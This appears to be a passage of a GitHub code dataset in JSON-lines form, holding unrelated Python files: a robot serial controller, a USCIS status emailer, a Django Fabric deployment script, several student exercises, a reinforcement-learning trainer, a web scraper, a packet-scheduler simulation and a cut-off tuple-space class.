getch_nonBlock\nIntenta leer de teclado.\nDevuelve una lista con todas las teclas pulsadas, pendientes de ser leidas.\nEn la lista, encontrareis los valores numericos ASCII de cada tecla. Ejemplo: si pulsais 'a', en la lista se anyadira un 97\nSi no se ha pulsado ninguna tecla, la funcion retorna INMEDIATAMENTE con una LISTA VACIA.\n\"\"\"\ndef getch_nonBlock():\n\ttry:\n\t\told_settings_in = termios.tcgetattr(sys.stdin)\n\t\told_settings_out = termios.tcgetattr(sys.stdout)\n\t\tnew_settings_in = old_settings_in\n\t\tnew_settings_in[3] = new_settings_in[3] & ~termios.ECHO & ~termios.ICANON # lflags\n\t\tnew_settings_in[6][termios.VMIN] = 0 # cc array. NonCanonical behaviour values\n\t\tnew_settings_in[6][termios.VTIME] = 0 # cc array. NonCanonical behaviour values\n\t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings_in)\n\t\t\n\t\tch_set = []\n\t\tch = os.read(sys.stdin.fileno(), 1)\n\t\twhile ch is not None and len(ch) > 0:\n\t\t\tch_set.append(ord(ch[0]))\n\t\t\tch = os.read(sys.stdin.fileno(), 1)\n\n\tfinally:\n\t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings_in)\n\t\ttermios.tcsetattr(sys.stdout, termios.TCSADRAIN, old_settings_out)\n\n\treturn ch_set\n\n\n\n# Llamada a la funcion main\nif __name__ == '__main__':\n\n\tglobal ser\n\t# Open the Serial Port.\n\tser = serial.Serial(port='/dev/ttyACM0', baudrate=115200, timeout=1)\n\n\tenvia(ser,'TestMode On', 0.2)\n\tenvia(ser,'PlaySound 1', 0.2)\n\tenvia(ser,'SetMotor LWheelEnable RWheelEnable', 0.2)\n\n\t# Declaracion de variables relacionadas con el robot, dimensiones, cinematica diferencial, etc.\n\tTs=0.1 # cada iteracion del bucle de control se ejecutara cada Ts seg\n\tS = 121.5 # mm\n\tVc = 0 # mm/s\n\tTita_dot = 0 # rad/s\n\t\n\t#Condiciones iniciales\n\tposeX=0 # mm\n\tposeY=0 # mm\n\tposeTita=0 # rad\n\n\t# Inicializar variables\n\t\n\n\tstartPose = [0, 0, 0] # startPose [x y theta]\n\tpuntos = [[3, 5]] # Camino de puntos por donde pasara el robot\n\tgoal = [0, -2] # goal position\n\n\tKv = 0.9 # Velocity Gain. Units (m/s)/m = [1/s]\n\tKh = 4 # Head Gain. Units [1/s]\n\tr = 0.1 # wheels radius\n\t#S = 0.26 # half of the distance between the wheels' center\n\tts = 0.1 # sample time\n\t\n\t\"\"\"\n\t#Inicialización de variables odometria del robot, para calculos posteriores de la evolución Pose\n\tmsg = envia(ser, 'GetMotors LeftWheel RightWheel', 0.01, False).split('\\n')\n\todoL = int(msg[4].split(',')[1])\n\todoR = int(msg[8].split(',')[1])\n\t\"\"\"\n\n\tstartTime = time.time()\n\tcurrentTime = startTime\n\n\n\tprint(\"\")\n\tprint(\"TIME = \",currentTime-startTime)\n\n\n\t### run gotopoint\n\n\tcurrentPose = poseTita\n\n\tpoints = [3, 5]\n\n\n\n\t# Bucle para recorrer las coordenadas\n\t#for i in range(1, len(points)):\n\t\t# Obtener la coordenada goal y currentPose\n\t\t#goal = points(i)\n\t\t# Llamar a la función myFunction con los parámetros adecuados\n\t\t#currentPose = goToPoint(goal, currentPose, Kv, Kh, r, S, ts)\n\n\t\n\t# Control Loop. It executes every Ts seconds, useful for doing tasks that must be executed periodically (e.g. Forward Kinematics for Pose integration)\n\twhile True:\n\t\t# Wait until the next Control Loop can be started\n\t\tnextTime = currentTime+Ts\n\t\twhile (time.time()=0:\n create_email = \"Subject: CHECK STATUS its APPROVED !!!\"\n from_address = \"YOUR_EMAIL_ADDRESS\"\n to_address = \"YOUR_EMAIL_ADDRESS\"\n \n mail = smtplib.SMTP(\"smtp.gmail.com\", 587)\n \n mail.starttls()\n \n mail.login(\"YOUR_EMAIL_ADDRESS\", \"YOUR_EMAILS_PASSWORD\")\n mail.sendmail(from_address, to_address, create_email)\n mail.close()\n \n print(\"Approved :) \")\n except Exception as ex:\n print(\"Not Approved :(\")\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n \n \nvisit_tool()\n\ntime.sleep(5)\ndriver.quit()\n","repo_name":"mujib2953/uscis_case_status","sub_path":"uscis.py","file_name":"uscis.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12368924278","text":"import time\nimport getpass\nfrom fabric.api import env, roles, execute, run, sudo, puts\nfrom fabric.context_managers import cd, settings, prefix\nfrom fabric.contrib.files import append\nfrom fabric.contrib.console import confirm\n\n\n# Get Mac username and use it for sudo actions\nUSERNAME = ''.join(ch for ch in getpass.getuser() if ch.isalnum())\n\n### Configuration options start. ###\nPROJECT_NAME = '{{project_name}}' # Dir name that contains the settings dir\nPROJECT_REPO = 'git@github.com:pixeldomain/{{project_name}}.git'\nSERVER = 'pixeldomain.co.uk'\nDOMAIN = '{{project_name}}.pixeldomain.co.uk'\nGUNICORN_PORT = '80??'\n#USERNAME = '' # use if your local login is not the same as remote\n### Configuration options end. ###\n\nVIRTUAL_ENVS = '/home/production/venv'\n\nenv.user = 'production'\nenv.roledefs = {\n 'web_workers': [SERVER, ],\n 'database': [SERVER, ],\n 'sudo_actions': ['{0}@{1}'.format(USERNAME, DOMAIN), ]\n}\nenv.root_path = '/home/production/public_html/{0}'.format(PROJECT_NAME)\n\n\ndef deploy():\n \"\"\"Deploys to the live server.\"\"\"\n\n # Setup\n env.release = time.strftime('%Y%m%d%H%M%S')\n deployment_tasks = []\n\n # Options\n opt_initial = confirm('Is this the initial deployment?', default=False)\n if not opt_initial:\n opt_update_deps = confirm('Update pip dependencies?', default=False)\n\n opt_migrate_database = confirm('Sync and migrate database?', default=False)\n opt_take_offline = False\n if opt_migrate_database:\n opt_take_offline = confirm(('Take site offline during '\n 'sync and migration?'), default=True)\n\n opt_restart_web_workers = confirm('Restart web workers?', default=True)\n\n # Queue up deployment tasks\n if opt_initial:\n deployment_tasks.append(initial_deployment)\n deployment_tasks.append(create_supervisor_config)\n deployment_tasks.append(create_gunicorn_config)\n else:\n deployment_tasks.append(get_latest_release)\n if opt_update_deps:\n deployment_tasks.append(update_dependencies)\n\n if not confirm('Preparation complete, continue?', default=True):\n return\n\n if opt_migrate_database:\n if opt_take_offline:\n deployment_tasks.append(stop_web_workers)\n deployment_tasks.append(symlink_current_release)\n deployment_tasks.append(sync_and_migrate)\n else:\n deployment_tasks.append(symlink_current_release)\n\n deployment_tasks.append(collect_static)\n\n if opt_restart_web_workers or opt_take_offline:\n if opt_take_offline:\n deployment_tasks.append(start_web_workers)\n else:\n deployment_tasks.append(restart_web_workers)\n\n # Run tasks\n for task in deployment_tasks:\n execute(task)\n\n\n@roles('web_workers')\ndef update_dependencies():\n with cd('{0}/source/requirements'.format(env.root_path)):\n with prefix('source {0}/{1}/bin/activate'.format(\n VIRTUAL_ENVS, PROJECT_NAME)):\n run('pip install -r production.txt')\n\n\n@roles('web_workers')\ndef initial_deployment():\n \"\"\"Initial deployment tasks.\n\n Create the required directories, checkout the source code and install\n dependencies.\n \"\"\"\n\n run('mkdir {0}'.format(env.root_path))\n with cd(env.root_path):\n run('mkdir config')\n run('mkdir releases')\n run('mkdir releases/current')\n run('mkdir releases/previous')\n run('mkdir media')\n run('mkdir static')\n run('git clone {0} source'.format(PROJECT_REPO))\n\n with cd(VIRTUAL_ENVS):\n run('virtualenv {0}'.format(PROJECT_NAME))\n\n update_dependencies()\n\n\n@roles('web_workers')\ndef get_latest_release():\n \"\"\"Get the latest stable version of the code.\n\n Create an archive from the current Git master branch and place in folder\n then symlink folders\n \"\"\"\n\n run('mkdir {0}/releases/{1}'.format(env.root_path, env.release))\n with cd('{0}/source'.format(env.root_path)):\n run('git pull origin master')\n run('git archive master | tar -xm -C {0}/releases/{1}'.format(\n env.root_path, env.release))\n\n run('ln -s /home/production/public_html/{0}/media '\n '/home/production/public_html/{1}/releases/{2}/src/'.format(\n PROJECT_NAME, PROJECT_NAME, env.release))\n run('ln -s /home/production/public_html/{0}/static '\n '/home/production/public_html/{1}/releases/{2}/src/'.format(\n PROJECT_NAME, PROJECT_NAME, env.release))\n\n\n@roles('web_workers')\ndef symlink_current_release():\n \"\"\"Symlink Release to live folder.\"\"\"\n\n with settings(warn_only=True):\n with cd('{0}'.format(env.root_path)):\n run('rm releases/previous -R')\n run('mv releases/current releases/previous')\n run('ln -s {0} releases/current'.format(env.release))\n\n\n@roles('database')\ndef sync_and_migrate():\n \"\"\"Sync and migrate the database.\"\"\"\n\n with cd('{0}/releases/current/src'.format(env.root_path)):\n with prefix('source {0}/{1}/bin/activate'.format(\n VIRTUAL_ENVS, PROJECT_NAME)):\n\n # Only show migration warnings for some reason it kicks up a fuss\n with settings(warn_only=True):\n run('python manage.py migrate '\n '--settings={0}.settings.live'.format(PROJECT_NAME))\n\n\n@roles('web_workers')\ndef collect_static():\n \"\"\"Run manage.py collectstatic.\"\"\"\n\n with cd('{0}/releases/{1}/src'.format(env.root_path, env.release)):\n with prefix('source {0}/{1}/bin/activate'.format(\n VIRTUAL_ENVS, PROJECT_NAME)):\n run('python manage.py collectstatic '\n '--noinput '\n '--settings={0}.settings.live'.format(PROJECT_NAME))\n\n\n@roles('sudo_actions')\ndef stop_web_workers():\n sudo('supervisorctl stop {0}'.format(PROJECT_NAME))\n\n\n@roles('sudo_actions')\ndef start_web_workers():\n sudo('supervisorctl start {0}'.format(PROJECT_NAME))\n\n\n@roles('sudo_actions')\ndef restart_web_workers():\n sudo('supervisorctl reload')\n\n\n@roles('sudo_actions')\ndef create_supervisor_config():\n config = \"\"\"[program:%(project)s]\ndirectory = /home/production/public_html/%(project)s/releases/current/src\nuser = production\ncommand = /home/production/public_html/%(project)s/config/gunicorn.sh\nstdout_logfile = /home/production/logs/logfile_supervisor_%(project)s\nstderr_logfile = /home/production/logs/errlog_supervisor_%(project)s\n\"\"\" % ({'project': PROJECT_NAME})\n path = '/etc/supervisor/conf.d/{0}.conf'.format(PROJECT_NAME)\n append(path, config, use_sudo=True)\n sudo('supervisorctl reload')\n\n\n@roles('web_workers')\ndef create_gunicorn_config():\n config = \"\"\"#!/bin/bash\nset -e\n\nLOGFILE=/home/production/logs/logfile_gunicorn_%(project)s\nLOGDIR=$(dirname $LOGFILE)\nNUM_WORKERS=3\n# user/group to run as\nUSER=production\nGROUP=webmaster\nADDRESS=127.0.0.1:%(port)s\nDJANGO_SETTINGS_MODULE=%(project)s.settings.live\n\ncd /home/production/public_html/%(project)s/releases/current/src\nsource /home/production/venv/%(project)s/bin/activate\nexport DJANGO_SETTINGS_MODULE=$DJANGO_SETTINGS_MODULE\n\nexec gunicorn %(project)s.wsgi:application \\\\\n --workers=$NUM_WORKERS \\\\\n --bind=$ADDRESS \\\\\n --user=$USER --group=$GROUP \\\\\n --log-level=debug \\\\\n --error-logfile=$LOGFILE\n\"\"\" % ({'project': PROJECT_NAME, 'port': GUNICORN_PORT})\n path = '/home/production/public_html/{0}/config/gunicorn.sh'.format(\n PROJECT_NAME)\n append(path, config)\n run('chmod +x {0}'.format(path))\n puts('Now create the database and set the environment variables.')\n","repo_name":"pixeldomain/django-project-template","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9655744546","text":"# Create organic balls using text.\n\nsize(600, 600)\n\nfont('Zapfino')\nfontsize(72)\n\n# Draw a black background. Setting the background to None\n# gives an empty background.\nbackground(0)\n\n# Move to the center of the composition. Note that, because\n# we use Zapfino, the ball will end up off-center.\ntranslate(WIDTH/2,HEIGHT/2)\nfor i in range(100):\n # The trick is skewing, rotating and scaling without\n # moving so all elements share the same centerpoint.\n push()\n # Select a value between (0,0,0) (black) and (1,0,0) (red).\n fill(random(),0,0)\n rotate(random(0,800))\n scale(random()*2)\n skew(random(200))\n text('(',0,0)\n pop()","repo_name":"nodebox/nodebox-pyobjc","sub_path":"examples/Text/OrganicBall.py","file_name":"OrganicBall.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"14309076196","text":"\nclass Call(object):\n\tdef __init__(self, unique_id, caller_name, caller_phone, call_time, call_reason):\n\t\tself.unique_id = unique_id\n\t\tself.caller_name = caller_name\n\t\tself.caller_phone = caller_phone\n\t\tself.call_time = call_time\n\t\tself.call_reason = call_reason\n\t\tself.call = [self.unique_id, self.caller_name, self.caller_phone, self.call_time, self.call_reason]\n\tdef display(self):\n\t\tprint (\"ID: \" + str(self.unique_id))\n\t\tprint (\"Call: \" + self.caller_name)\n\t\tprint (\"Caller phone: \"+ self.caller_phone)\n\t\tprint (\"Call Time: \" + self.call_time)\n\t\tprint (\"Reason: \" + self.call_reason)\n\t\tprint (self.call)\n\nclass CallCenter(object):\n\tdef __init__(self):\n\t\t#self.call = []\n\t\tself.queue = []\n\t\tself.queue_size = 0\n\tdef add(self, call):\n\t\tself.call = [call]\n\t\t#self.queue + self.call\n\t\t#self.queue.insert(0, call)\n\t\tself.queue_size + 1\n\t\tprint (self.queue)\n\t\treturn self\n\tdef remove(self): \t\n\t\tself.queue(pop)\n\t\tself.queue_size - 1\n\t\treturn self\t\n\tdef info(self):\n\t\tprint (self.queue)\n\t\tprint (\"name: \")\n\t\tprint (\"number: \")\n\t\tprint (\"Queue size =\" + str(self.queue_size))\t\n\t\t\ncall1 = Call(1, \"MaryAnne\", \"555-5555\", \"7:34 PM\", \"Out of coconuts\")\t\t\ncall1.display()\n\ncall2 = Call(2, \"Gilligan\", \"555-5556\", \"7:37 PM\", \"Kidnapped by an Ape\")\t\ncall2.display()\t\t\n\nq1 = CallCenter()\nq1.add(call1)\nq1.info()","repo_name":"sanjosejulia/Python","sub_path":"CallCenter.py","file_name":"CallCenter.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38528157541","text":"import sys\nimport os\nimport tensorflow as tf\n\nif 'COLAB_GPU' in os.environ:\n # fix resolve modules\n from os.path import dirname\n sys.path.append(dirname(dirname(dirname(__file__))))\nelse: # local GPU\n gpus = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1 * 1024)]\n )\n \nimport Agents\nimport ConvDQNModel\nfrom CREDQEnsemble import CREDQEnsembleTrainable\n\nfrom ExperienceBuffers.CHGExperienceStorage import CHGExperienceStorage\nimport numpy as np\nfrom Utils.CNoisedNetwork import CNoisedNetwork\nimport time\nimport Utils\nimport math\nimport random\nfrom collections import defaultdict\n\ndef train(model, memory, params):\n T = time.time()\n lossSum = defaultdict(int) \n for _ in range(params['episodes']):\n batch, Err = memory.sampleReplays(1024)\n states, actions, rewards, nextStates, nextStateScoreMultiplier = batch[:5]\n \n states = Utils.restoreStates(states)\n nextStates = Utils.restoreStates(nextStates)\n actions = actions.astype(np.int)\n \n ###############\n errors, loss = model.fit(states, actions, rewards, nextStates, nextStateScoreMultiplier)\n lossSum['loss'] += loss\n Err.update(errors)\n ###\n model.updateTargetModel(0.01)\n\n print('Training finished in %.1f sec.' % (time.time() - T))\n trainLoss = {k: v / params['episodes'] for k, v in lossSum.items()}\n print('Losses:')\n for k, v in trainLoss.items():\n print('Avg. %s: %.4f' % (k, v))\n print('')\n return\n\ndef forkAgent(model, epoch, params):\n LBM = model.clone()\n nm = 'LBM-%d' % epoch\n return (\n CNoisedNetwork(LBM, noise=.1+random.random() * 0.2),\n lambda world: Agents.CAgent(world, kind=nm)\n )\n\ndef learn_environment(model, params):\n NAME = params['name']\n metrics = {}\n wrHistory = {\n 'network': []\n }\n\n memory = CHGExperienceStorage(params['experience storage'])\n ######################################################\n lastBestModels = [forkAgent(model, 0, params)] * 3\n\n def testModel(EXPLORE_RATE, epoch):\n T = time.time()\n opponents = [\n (Utils.DummyNetwork, Agents.CGreedyAgent),\n (Utils.DummyNetwork, Agents.CGreedyAgent),\n (Utils.DummyNetwork, Agents.CGreedyAgent),\n ] if 0 == (epoch % 2) else lastBestModels\n\n res = Utils.collectExperience(\n [ # agents\n (CNoisedNetwork(model, EXPLORE_RATE), Agents.CAgent),\n *opponents\n ],\n memory,\n {\n 'episodes': params['test episodes'],\n 'env': params.get('env', {})\n }\n )\n print('Testing finished in %.1f sec.' % (time.time() - T))\n return res\n ######################################################\n # collect some experience\n for epoch in range(2):\n testModel(EXPLORE_RATE=0.8, epoch=0)\n\n #######################\n for epoch in range(params['epochs']):\n T = time.time()\n\n EXPLORE_RATE = params['explore rate'](epoch)\n print('[%s] %d/%d epoch. Explore rate: %.3f.' % (NAME, epoch, params['epochs'], EXPLORE_RATE))\n ##################\n # Training\n# if params.get('target update', lambda _: True)(epoch):\n# model.updateTargetModel()\n \n train(model, memory, { 'episodes': params['train episodes'](epoch) })\n\n ##################\n os.makedirs('weights', exist_ok=True)\n model.save('weights/%s-latest.h5' % NAME)\n # test\n if (epoch % params['test interval']) == 0:\n print('Testing...')\n stats, winRates = testModel(EXPLORE_RATE, epoch)\n for k, v in stats.items():\n Utils.trackScores(v, metrics, metricName=k)\n \n for k, v in winRates.items():\n if k not in wrHistory:\n wrHistory[k] = [0] * epoch\n wrHistory[k].append(v)\n ##################\n \n print('Scores sum: %.5f' % sum(stats['Score_network']))\n \n if (0 < (epoch % 2)) and (params['min win rate'] <= winRates['network']):\n print('save model (win rate: %.2f%%)' % (100.0 * winRates['network']))\n model.save('weights/%s-epoch-%06d.h5' % (NAME, epoch))\n ########\n lastBestModels.insert(0, forkAgent(model, epoch, params))\n modelsHistory = params.get('models history', 3)\n lastBestModels = lastBestModels[:modelsHistory]\n \n os.makedirs('charts/%s' % NAME, exist_ok=True)\n for metricName in metrics.keys():\n Utils.plotData2file(metrics, 'charts/%s/%s.jpg' % (NAME, metricName), metricName)\n Utils.plotSeries2file(wrHistory, 'charts/%s/win_rates.jpg' % (NAME,), 'Win rates')\n ##################\n print('Epoch %d finished in %.1f sec.' % (epoch, time.time() - T))\n print('------------------')\n return\n############\n\nnetwork = CREDQEnsembleTrainable(\n submodel=ConvDQNModel.createModel,\n NModels=3, M=2\n)\nnetwork.summary()\n\n# calc GAMMA so +-1 reward after N steps would give +-0.001 for current step\nGAMMA = math.pow(0.001, 1.0 / 50.0)\nprint('Gamma: %.5f' % GAMMA)\n\nENVIRONMENT_SETTINGS ={\n 'episode steps': 200,\n 'min players': 2,\n ##############\n 'survived reward': +5,\n 'kill reward': +0,\n 'grow reward': lambda x: 0.1,\n 'starve reward': -10,\n 'death reward': -0,\n 'opponent death reward': +0,\n 'killed reward': -0,\n 'rank reward': {\n 1: 11,\n 2: 5,\n 3: -5,\n 4: -10\n }\n}\n\nDEFAULT_LEARNING_PARAMS = {\n 'experience storage': {\n 'batch size': 256,\n 'gamma': GAMMA,\n 'bootstrapped steps': 1,\n 'fetch replays': {\n 'replays': 256 * 1,\n 'batch interval': 2000,\n },\n \n 'replays': {\n 'disabled': True,\n 'folder': os.path.join(os.path.dirname(__file__), 'replays'),\n 'replays per chunk': 1000,\n 'env': ENVIRONMENT_SETTINGS,\n },\n \n 'low level policy': {\n },\n \n 'high level policy': {\n 'steps': 5,\n 'samples': 25,\n },\n },\n\n 'epochs': 10000,\n 'train episodes': lambda _: 16,\n 'test interval': 1,\n 'test episodes': 1,\n\n 'explore rate': lambda e: 0.0,\n \n 'env': ENVIRONMENT_SETTINGS,\n 'min win rate': 0.55,\n}\n#######################\nfor i in range(1):\n learn_environment(\n network,\n {\n **DEFAULT_LEARNING_PARAMS,\n 'name': 'agent-%d' % i\n }\n )","repo_name":"GreenWizard2015/Hungry-Geese","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5447271916","text":"# honestly found it on the internet:\n\n# import math\n# n = int(input(\"Enter a number to calculate its factorial\"))\n# print(math.factorial(n))\n\n\nnum = int(input(\"Enter a number to calculate its factorial\"))\n\nfactorial = 1\nwhile num > 1:\n factorial *= num\n num -= 1\n \nprint(\"The factorial\", factorial)\n","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"DMan/HW5/5.3.py","file_name":"5.3.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39560442350","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nURL = 'https://www.fl.ru/projects/'\nHEADERS = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0', 'accept': '*/*'}\nHOST = 'https://www.fl.ru'\nFILE = 'offers.csv'\n\ndef get_html(url, params=None):\n r = requests.get(url, headers=HEADERS, params=params)\n return r\n\ndef get_pages_count(html):\n soup = BeautifulSoup(html, 'html.parser')\n pagination = soup.findAll('li', class_='b-pager__item')\n if pagination:\n return int(pagination[-1].get_text())\n else:\n return 1\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.findAll('h2', class_='b-post__title')\n\n offers = []\n for item in items:\n offers.append({\n 'title': item.find('a', class_='b-post__link').get_text(strip=True),\n 'link': HOST + item.find('a', class_='b-post__link').get('href')\n })\n return offers\n\ndef save_file(items, path):\n with open(path, 'w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(['Название', 'Ссылка'])\n for item in items:\n writer.writerow([item['title'], item['link']])\n\n\ndef parse():\n html = get_html(URL)\n if html.status_code == 200:\n offers = []\n pages_count = get_pages_count(html.text)\n for page in range(1, 20):\n print(f'Пытаюсь найти что-то годное! Страница {page} из 19...')\n html = get_html(URL, params={'page': page})\n offers.extend(get_content(html.text))\n save_file(offers, FILE)\n print(f'Пропарсили {len(offers)} предложений')\n else:\n print(\"Error\")\n\nparse()","repo_name":"mfkrg/PY-FL-Parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24077994022","text":"# Program for n’th node from the end of a Linked List\n# Given a Linked List and a number n, write a function that returns the value at the n’th node from end of the Linked List.\n\n# For example, if input is below list and n = 3, then output is “B”\n# A->B->C->D->\n\nclass node(object):\n\tdef __init__(self,x):\n\t\tself.data = x\n\t\tself.next = None\n\nclass LinkedList(object):\n\tdef __init__(self):\n\t\tself.head = None\n\t\tself.currNode = None\n\tdef push(self,x):\n\t\ttemp = node(x)\n\t\tif self.head is None:\n\t\t\tself.head = temp\n\t\t\tself.currNode = self.head\n\t\telse:\n\t\t\tself.currNode.next = temp\n\t\t\tself.currNode = temp\n\tdef printNthNodeFromEnd(self,count):\n\t\ttemp1 = self.head\n\t\ttemp2 = self.head\n\t\twhile(count > 0):\n\t\t\ttemp1 = temp1.next\n\t\t\tcount -=1\n\t\twhile(temp1 is not None):\n\t\t\ttemp1 = temp1.next\n\t\t\ttemp2 = temp2.next\n\t\tprint(temp2.data)\nl = LinkedList()\n\nl.push('A')\nl.push('B')\nl.push('C')\nl.push('D')\n\nl.printNthNodeFromEnd(3)","repo_name":"zack4114/Amazon-Questions","sub_path":"PrintNthNodeFromEndOfLinkedList.py","file_name":"PrintNthNodeFromEndOfLinkedList.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29630194291","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PA_Exercise_02 import Exercise_1\nfrom PA_Exercise_02 import Exercise_2\nfrom PA_Exercise_02 import CrossValidation as CV\n\nSHOW_ASSIGNMENT = False\nSHOW_OBSERVE_1 = False\nSHOW_OBSERVE_2 = False\nSHOW_CV = True\n\nif __name__==\"__main__\":\n ex1 = Exercise_1(3)\n ex2 = Exercise_2()\n\n samples = [10000,50000,100000,200000,400000] \n weights = [9,40,60]\n\n if SHOW_ASSIGNMENT:\n img_1 = ex1.get_img()\n img_2 = ex1.do_sampling(100000)\n img_3 = ex2.do_sampling(img_2,9)\n \n plt.figure(\"Group 20: Exercise 02 result\", figsize=(10,3))\n plt.subplot(131)\n plt.imshow(img_1,cmap=\"gray\")\n plt.title(\"Gaussian filter with \\\\sigema = {}\".format(3))\n plt.subplot(132)\n plt.imshow(img_2)\n plt.title(\"New img with sample = {}\".format(100000)) \n plt.subplot(133)\n plt.imshow(img_3)\n plt.title(\"New img with kernel = {}\".format(9))\n plt.suptitle(\"Group 20: Exercise 02 result\")\n\n if SHOW_OBSERVE_1:\n idx = 1\n plt.figure(\"Observe from exercise 1\")\n sampleNum = len(samples)\n for sample in samples:\n img = ex1.do_sampling(sample) \n plt.subplot(1,sampleNum,idx)\n plt.imshow(img)\n plt.title(\"New img with sample = {}\".format(sample)) \n idx += 1\n plt.suptitle(\"Observe from exercise 1\") \n \n if SHOW_OBSERVE_2:\n idx = 1\n plt.figure(\"Observe from exercise 2\")\n weightNum = len(weights)+1\n imgInput = ex1.do_sampling(100000)\n plt.subplot(1,weightNum,idx)\n plt.imshow(imgInput)\n plt.title(\"Input img with sample = {}\".format(100000)) \n \n for weight in weights:\n idx += 1\n img = ex2.do_sampling(imgInput, weight) \n plt.subplot(1,weightNum,idx)\n plt.imshow(img)\n plt.title(\"New img with K-weight = {}\".format(weight)) \n plt.suptitle(\"Observe from exercise 2\") \n \n if SHOW_CV:\n sampleSize = [100000]\n k = 10\n\n candidateMin = 7\n candidateMax = 15 \n candidate = np.linspace(candidateMin, candidateMax, candidateMax-candidateMin+1)\n\n gtd = ex1.get_img()\n cv = CV(k, candidate, gtd, (ex1,ex2))\n \n for sample in sampleSize: \n res = cv.train(ex1.get_idx(sample))\n cv.plotResult(res,sample)\n\n plt.show()\n\n","repo_name":"skye789/PA","sub_path":"B_ Exercise Worksheets a Material/code_hu/EX1/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40392198424","text":"\"\"\"\nA basic example that connects two packet generators to a network wire with\na propagation delay distribution, and then to a packet sink.\n\"\"\"\n\nfrom onl.packet import DistPacketGenerator, PacketSink\nfrom onl.scheduler import SP\nfrom onl.sim import Environment\n\n\ndef arrival_1():\n \"\"\"Packets arrive with a constant interval of 1.5 seconds.\"\"\"\n return 1.5\n\n\ndef arrival_2():\n \"\"\"Packets arrive with a constant interval of 2.0 seconds.\"\"\"\n return 2.0\n\n\ndef packet_size():\n return 100\n\n\nenv = Environment()\nsp1 = SP(env, 100, {0: 1, 1: 10}, debug=True)\nsp2 = SP(env, 100, {0: 50, 1: 100}, debug=True)\nps = PacketSink(env, rec_flow_ids=False, debug=True)\n\npg1 = DistPacketGenerator(env, \"flow_1\", arrival_1, packet_size, flow_id=0)\npg2 = DistPacketGenerator(env, \"flow_2\", arrival_2, packet_size, flow_id=1)\n\npg1.out = sp1\npg2.out = sp1\nsp1.out = sp2\nsp2.out = ps\n\nenv.run(until=20)\n","repo_name":"OpenNetLab/OpenNetLab-Edu","sub_path":"tests/apps/sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69818207092","text":"from threading import Thread, Condition, Lock\nfrom . import TupleSpaceBucket\nfrom contextlib import contextmanager\nfrom collections import defaultdict\n\n\nclass TupleSpaceParallelBuckets(TupleSpaceBucket):\n\n def __init__(self):\n super().__init__()\n\n #List of the mutation locks for the buckets\n self.mutation_locks_list = defaultdict(list)\n self.mutation_lock_update = Condition()\n\n #List of the number of readers duing queries in each bucket\n self.readers_list = defaultdict(list)\n self.reader_lock_update = Condition()\n\n #List of the locks for the number of readers in each bucket\n self.readers_locks_list = defaultdict(list)\n self.readers_lock_list_update = Condition()\n\n #List of the query locks for each bucket\n self.query_locks_list = defaultdict(list)\n self.query_lock_update = Condition()\n\n\n def hash(self,sequence):\n #Hash function - similar to the one used for the buckets\n return tuple(x if isinstance(x, type) else type(x) for x in sequence)\n\n\n def put(self, *tuple):\n \"\"\"Place tuple in tuple space\n\n Notifies all locks of new tuple.\n \"\"\"\n with self.mutation_lock(tuple,notify=True), self.query_lock(tuple,notify=True):\n # run tuple insertion logic while lock is held\n self._add(tuple)\n\n\n def get(self, *pattern, blocking=True):\n \"\"\"Fetch, remove and return tuple from repository\n\n If blocking, wait until match. Otherwise, return None.\n \"\"\"\n while True:\n with self.mutation_lock(pattern):\n try:\n tuple = self._find(pattern)\n self._remove(tuple)\n return tuple\n except:\n if blocking:\n self.wait_mutation_lock(pattern)\n else:\n return None\n\n\n def query(self, *pattern, blocking=True):\n \"\"\"Find and return tuple, blocks until tuple is available\n\n Same as atomic version of\n > tuple = get(*pattern)\n > put(tuple)\n > return tuple\n \"\"\"\n while True:\n #If first reader, get lock\n with self.readers_lock(pattern):\n r = self.addReader(pattern)\n if r == 1:\n self.get_mutation_lock(pattern)\n try:\n wait = False # must be reset to False on each iteration\n return self._find(pattern)\n except:\n if not blocking:\n return None\n else:\n wait = True # ensure block after query update\n finally:\n #If last reader, release lock\n with self.query_lock(pattern):\n with self.readers_lock(pattern):\n r = self.removeReader(pattern)\n if r == 0:\n self.release_mutation_lock(pattern)\n if wait:\n 